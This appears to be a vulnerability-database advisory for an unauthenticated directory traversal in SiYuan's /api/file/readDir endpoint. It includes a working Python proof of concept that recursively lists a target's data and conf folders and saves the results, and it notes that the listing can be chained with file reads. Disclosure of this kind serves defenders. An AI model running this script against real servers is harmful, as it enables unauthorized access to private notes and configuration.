Описание
SiYuan has directory traversal within its publishing service
Details
The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.
PoC
#!/usr/bin/env python3
"""POC: SiYuan /api/file/readDir 未鉴权目录遍历"""
import requests, json, sys
def poc(target):
base = target.rstrip("/")
url = f"{base}/api/file/readDir"
def read_dir(path, depth=0, max_depth=4):
try:
r = requests.post(url, json={"path":path},
headers={"Content-Type":"application/json"}, timeout=10)
data = r.json()
except Exception as e:
return
if data.get("code") != 0:
return
entries = data.get("data") or []
for entry in entries:
name = entry.get("name","")
if name.startswith("."):
continue
icon = "📁" if entry.get("isDir") else "📄"
indent = " " * depth
print(f" {indent}{icon} {name}")
if entry.get("isDir") and depth < max_depth:
read_dir(f"{path}/{name}", depth+1, max_depth)
# 遍历根目录
print("[+] 漏洞存在!开始遍历\n")
print(" 📂 data/")
read_dir("data", max_depth=2)
print("\n 📂 conf/")
read_dir("conf", max_depth=2)
# 保存
try:
r = requests.post(url, json={"path":"data"},
headers={"Content-Type":"application/json"}, timeout=10)
with open("readdir.json","w",encoding="utf-8") as f:
json.dump(r.json(), f, ensure_ascii=False, indent=2)
print(f"\n[+] 根目录数据已保存: readdir.json")
except: pass
if __name__ == "__main__":
poc(sys.argv[1] if len(sys.argv)>1 else "http://172.18.40.184")
Impact
Directory traversal vulnerability: The entire directory structure of a notebook could be obtained, and then a file reading vulnerability could be exploited to achieve arbitrary document reading.
资源文件夹
插件文件夹
conf文件夹
Пакеты
Наименование
github.com/siyuan-note/siyuan/kernel
go
Затронутые версииВерсия исправления
<= 0.0.0-20260317012524-fe4523fff2c8
Отсутствует
Связанные уязвимости
CVSS3: 9.8
nvd
17 дней назад
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.